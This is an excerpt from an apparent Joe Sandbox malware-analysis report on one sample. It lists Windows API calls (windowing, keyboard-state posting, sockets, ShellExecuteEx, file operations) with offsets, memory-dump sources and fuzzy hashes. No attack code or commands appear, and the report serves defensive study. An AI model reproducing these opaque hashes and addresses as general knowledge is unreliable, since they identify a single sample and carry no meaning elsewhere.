                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00AC32C5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 29d42cc5c48bd9b8d6fc321176ccaef105deba9bfd32f91b4439b5a21e003613
                                                      • Instruction ID: 025d4ec7c97da12382de8010e1e8b8a3e4bf6bbca24598b7e801c92e52ed7005
                                                      • Opcode Fuzzy Hash: 29d42cc5c48bd9b8d6fc321176ccaef105deba9bfd32f91b4439b5a21e003613
                                                      • Instruction Fuzzy Hash: 8B11EB33209346BAAF015B54DC42EEAB7ECDF2AB70F11406EF50066181D6B56B4046A5
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AC454E
                                                      • LoadStringW.USER32(00000000), ref: 00AC4555
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AC456B
                                                      • LoadStringW.USER32(00000000), ref: 00AC4572
                                                      • _wprintf.LIBCMT ref: 00AC4598
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AC45B6
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00AC4593
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: de2871ff395648ae4746bdaf7f20d386015876cd9cd0e46373a3630d1176fbc8
                                                      • Instruction ID: 2d883152acb0e8a2d00ca2d0857fa117babb39a5a0e7dc8fa1be8df84cf39f30
                                                      • Opcode Fuzzy Hash: de2871ff395648ae4746bdaf7f20d386015876cd9cd0e46373a3630d1176fbc8
                                                      • Instruction Fuzzy Hash: 96014FF290024CBFE720E7E0DD89EE6776CD708301F4005A5BB49E6051EA749E868B74
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00AED78A
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00AED7AA
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00AED9E5
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AEDA03
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AEDA24
                                                      • ShowWindow.USER32(00000003,00000000), ref: 00AEDA43
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AEDA68
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00AEDA8B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 447fcae1c5f00400ee652399fbbbab003aa7b9652dcdbc215c13cd51fea2d451
                                                      • Instruction ID: 94d5585c11028aee7f7535807217c6fdd3e7062e339dd188dbf2ef96ff30042e
                                                      • Opcode Fuzzy Hash: 447fcae1c5f00400ee652399fbbbab003aa7b9652dcdbc215c13cd51fea2d451
                                                      • Instruction Fuzzy Hash: A3B166716002A5AFDF14CF6AC9C57B97BB1FF44701F098069EC489F696D734AA50CBA0
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A62ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000,000000FF), ref: 00A62B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A9C46A
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A9C417,00000004,00000000,00000000,00000000), ref: 00A9C4D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 21003dfde30c17f3c2250722357c68dc23346d53e3f37f8b2311fbfd59555861
                                                      • Instruction ID: 162c50f02158823c85bb59173c11174616a30b7b01bf230b41a34219f44866cb
                                                      • Opcode Fuzzy Hash: 21003dfde30c17f3c2250722357c68dc23346d53e3f37f8b2311fbfd59555861
                                                      • Instruction Fuzzy Hash: 4141E931704FC09EDB358B689DDCB7A7BF2EBA5350F14891DE0878A561C6B59842E710
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AC737F
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AC73B6
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AC73D2
                                                      • _memmove.LIBCMT ref: 00AC7420
                                                      • _memmove.LIBCMT ref: 00AC743D
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AC744C
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AC7461
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AC7480
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 81c48d0dcbdc26cdd804f9dfcf8eb6688b27ace86951f4a68fc6196b7ab952c6
                                                      • Instruction ID: c2a07a05db6864ebff1313aa1384444a6a0888a2b2178546f5414d5ec3cd8d62
                                                      • Opcode Fuzzy Hash: 81c48d0dcbdc26cdd804f9dfcf8eb6688b27ace86951f4a68fc6196b7ab952c6
                                                      • Instruction Fuzzy Hash: 0D316D71904245EFCF10EFA4DD85EAE7BB8EF44710B1581A9FA04AB256DB309A15CBA0
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00AE645A
                                                      • GetDC.USER32(00000000), ref: 00AE6462
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE646D
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00AE6479
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AE64B5
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AE64C6
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AE9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00AE6500
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AE6520
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 3df104ce5bb161007a64416604e111603dabf4315be5702ea4c2d6db101f7b15
                                                      • Instruction ID: 9151ff301a2b16a7e32d8f84fa72b0e137716305c5814073ccacd9f622f4c2c3
                                                      • Opcode Fuzzy Hash: 3df104ce5bb161007a64416604e111603dabf4315be5702ea4c2d6db101f7b15
                                                      • Instruction Fuzzy Hash: C7318B72201294BFEB118F55CC8AFEA3FA9EF19761F044065FE089E291D6759842CB70
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 6d856b4bf75c89b766a78f7ef75269fea6eb2f3152141b5ec9c7fe3ec60324c5
                                                      • Instruction ID: 6db527369618c6034f8376e7ff8110acf1433fcde4422c6f6e132ba08a5de1cd
                                                      • Opcode Fuzzy Hash: 6d856b4bf75c89b766a78f7ef75269fea6eb2f3152141b5ec9c7fe3ec60324c5
                                                      • Instruction Fuzzy Hash: C0216271742209BBE614B6259E46FFB33ACAF503B4B044021FE05A6283F755DE1383A5
                                                      APIs
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • _wcstok.LIBCMT ref: 00ACEEFF
                                                      • _wcscpy.LIBCMT ref: 00ACEF8E
                                                      • _memset.LIBCMT ref: 00ACEFC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 1766be0af2663c35199a0abd8a717b87c7bb066d779ea8e5c7d72508eb2d6929
                                                      • Instruction ID: fd554cb0aeededd6fd97fd3d1c43be7e75cd43457c1f71ebe4a31ef985480fad
                                                      • Opcode Fuzzy Hash: 1766be0af2663c35199a0abd8a717b87c7bb066d779ea8e5c7d72508eb2d6929
                                                      • Instruction Fuzzy Hash: DCC16A315083409FCB24EF24CA95E6EB7F4AF84314F05496DF9999B2A2DB30ED45CB82
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AD6F14
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AD6F35
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6F48
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00AD6FFE
                                                      • inet_ntoa.WSOCK32(?), ref: 00AD6FBB
                                                        • Part of subcall function 00ABAE14: _strlen.LIBCMT ref: 00ABAE1E
                                                        • Part of subcall function 00ABAE14: _memmove.LIBCMT ref: 00ABAE40
                                                      • _strlen.LIBCMT ref: 00AD7058
                                                      • _memmove.LIBCMT ref: 00AD70C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 83e852136eea0412e2aca4c8fe67a94ecf30b14416f85675dec239f3fdb47415
                                                      • Instruction ID: 6aa807b438966ccb084e17b14ed4e14c0a370088fc8ae2770acbb697b2d6f32d
                                                      • Opcode Fuzzy Hash: 83e852136eea0412e2aca4c8fe67a94ecf30b14416f85675dec239f3fdb47415
                                                      • Instruction Fuzzy Hash: 6581CD31508300AFD714EB24CD86E6FB3B9EF84714F148A1EF5569B2E2DA71AD05CB92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9192e6217a81e8c447e30c571dd1057ad6715d0ab9470d8825742fcb258a77e
                                                      • Instruction ID: ba5849f445b3631b22701c30d8e3bddfa7b7a543e447f1ebcf486f88e7e43eb7
                                                      • Opcode Fuzzy Hash: e9192e6217a81e8c447e30c571dd1057ad6715d0ab9470d8825742fcb258a77e
                                                      • Instruction Fuzzy Hash: 4F715A70900109EFCB14CF98CD89ABEBFB9FF85310F188159F916AB251C734AA51CBA0
                                                      APIs
                                                      • IsWindow.USER32(015956A8), ref: 00AEB6A5
                                                      • IsWindowEnabled.USER32(015956A8), ref: 00AEB6B1
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00AEB795
                                                      • SendMessageW.USER32(015956A8,000000B0,?,?), ref: 00AEB7CC
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00AEB809
                                                      • GetWindowLongW.USER32(015956A8,000000EC), ref: 00AEB82B
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AEB843
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: c1621940261a9f5d4332f7ec1d05cfaa8642d0608e2246086ff36c873da0fa2d
                                                      • Instruction ID: 48790588f0911b5d62795b5ee6e8f6c6b166ec0c37625f61b2152b7ce13adf0b
                                                      • Opcode Fuzzy Hash: c1621940261a9f5d4332f7ec1d05cfaa8642d0608e2246086ff36c873da0fa2d
                                                      • Instruction Fuzzy Hash: 9A719D34611284AFDB20DF66C9D8FAB7BB9FF49300F1444A9E9459B3A1C731AD51CB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00ADF75C
                                                      • _memset.LIBCMT ref: 00ADF825
                                                      • ShellExecuteExW.SHELL32(?), ref: 00ADF86A
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                        • Part of subcall function 00A7FEC6: _wcscpy.LIBCMT ref: 00A7FEE9
                                                      • GetProcessId.KERNEL32(00000000), ref: 00ADF8E1
                                                      • CloseHandle.KERNEL32(00000000), ref: 00ADF910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: 0bb4cfa00915610465de3dd8ffdf76c5b1365867ccb24592e8ae8b352cb30a7f
                                                      • Instruction ID: 0e90e95dc590a33758456e0d9ffb3f336eac69374ec64baac51759af1646b739
                                                      • Opcode Fuzzy Hash: 0bb4cfa00915610465de3dd8ffdf76c5b1365867ccb24592e8ae8b352cb30a7f
                                                      • Instruction Fuzzy Hash: 00619275A00619DFCF14EFA4C5959AEBBF5FF48310F14846AE85AAB351CB30AE41CB90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00AC149C
                                                      • GetKeyboardState.USER32(?), ref: 00AC14B1
                                                      • SetKeyboardState.USER32(?), ref: 00AC1512
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AC1540
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AC155F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AC15A5
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AC15C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 386405f1c9b6cb88aa67c1f8c2d2e13e121a1ef0492cbf3bffbbdb7a746f2e30
                                                      • Instruction ID: 1a22fc37e0ee679de40022434a8c537b0ba66a195c6e9d21f887b1dd573c656b
                                                      • Opcode Fuzzy Hash: 386405f1c9b6cb88aa67c1f8c2d2e13e121a1ef0492cbf3bffbbdb7a746f2e30
                                                      • Instruction Fuzzy Hash: 2651D1A0B047D93EFB3687248C45FBABEA99B47304F09858DE1D59A8C3D798EC84D750
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00AC12B5
                                                      • GetKeyboardState.USER32(?), ref: 00AC12CA
                                                      • SetKeyboardState.USER32(?), ref: 00AC132B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AC1357
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AC1374
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AC13B8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AC13D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: a542c5e83b3e87fed13c9eba1af4e8b73de548eaba8ae10042de4e563f403282
                                                      • Instruction ID: 916b89c93d2f8206135c40cb06d639d35d152b0a7cbb5b72e0c8b7e78a474822
                                                      • Opcode Fuzzy Hash: a542c5e83b3e87fed13c9eba1af4e8b73de548eaba8ae10042de4e563f403282
                                                      • Instruction Fuzzy Hash: 7051E1A0B046D57DFB3683248C45FBABFA9AB07304F09898DE1D45A9C3D794EC98D760
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: d8d06166cc0a432e4ea2d0f966f99ca0f58149f10f1147a773da3c8ffd62e2b0
                                                      • Instruction ID: 11e796f106b43f10ac19e87ddfdee849a363cd0d13e6622d830bd22b75081814
                                                      • Opcode Fuzzy Hash: d8d06166cc0a432e4ea2d0f966f99ca0f58149f10f1147a773da3c8ffd62e2b0
                                                      • Instruction Fuzzy Hash: A9419066C20618B6CB10FBB5898AACFB7BC9F04710F508556F918E3122F634E755C7A9
                                                      APIs
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AC38D3,?), ref: 00AC48C7
                                                        • Part of subcall function 00AC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AC38D3,?), ref: 00AC48E0
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00AC38F3
                                                      • _wcscmp.LIBCMT ref: 00AC390F
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC3927
                                                      • _wcscat.LIBCMT ref: 00AC396F
                                                      • SHFileOperationW.SHELL32(?), ref: 00AC39DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
